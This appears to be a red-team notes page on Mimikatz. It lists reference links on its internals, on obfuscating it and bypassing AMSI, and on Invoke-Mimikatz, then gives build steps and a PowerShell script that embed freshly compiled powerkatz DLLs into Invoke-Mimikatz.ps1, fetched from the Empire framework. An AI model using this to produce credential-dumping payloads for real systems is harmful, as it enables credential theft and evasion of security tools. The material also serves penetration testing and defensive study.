mimikatz.md

Mimikatz

• https://blog.xpnsec.com/exploring-mimikatz-part-1/
• https://blog.xpnsec.com/exploring-mimikatz-part-2/
• https://www.praetorian.com/blog/inside-mimikatz-part1/
• https://www.praetorian.com/blog/inside-mimikatz-part2/
• https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html

Obfuscate Mimikatz

• https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/
• https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/

Invoke-Mimikatz

• http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/

Update .ps1

• http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

Update the Invoke-Mimikatz.ps1 PowerShell script:

1. Grab source code zip from the latest (or any one you want) release of Mimikatz.
2. Open the solution in Visual Studio.
3. Select the Second_Release_PowerShell target option and compile for Win32.
4. Right-click on mimikatz solution > Properties > C/C++ > Set Treat warnings as errors to No (/WX-) > OK.
5. Compile for x64.
6. Transform the resulting powerkatz DLLs to base64 and replace the $PEBytes32 and $PEBytes64 vars at the bottom of Invoke-Mimikatz.ps1 with a PowerShell script below.

{% code title="Update-InvokeMimikatz.ps1" %}

$powerkatz32 = [System.IO.File]::ReadAllBytes("Win32\powerkatz.dll")
$powerkatz64 = [System.IO.File]::ReadAllBytes("x64\powerkatz.dll")
$encPowerkatz32 = [System.Convert]::ToBase64String($powerkatz32)
$encPowerkatz64 = [System.Convert]::ToBase64String($powerkatz64)
$invokeMimikatz = (New-Object Net.WebClient).DownloadString("https://github.com/BC-SECURITY/Empire/raw/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1") -replace '\$PEBytes32 = .*$', ('$PEBytes32 = ' + "'$encPowerkatz32'")
$invokeMimikatz -replace '\$PEBytes64 = .*$', ('$PEBytes64 = ' + "'$encPowerkatz64'") > Invoke-Mimikatz.ps1

{% endcode %}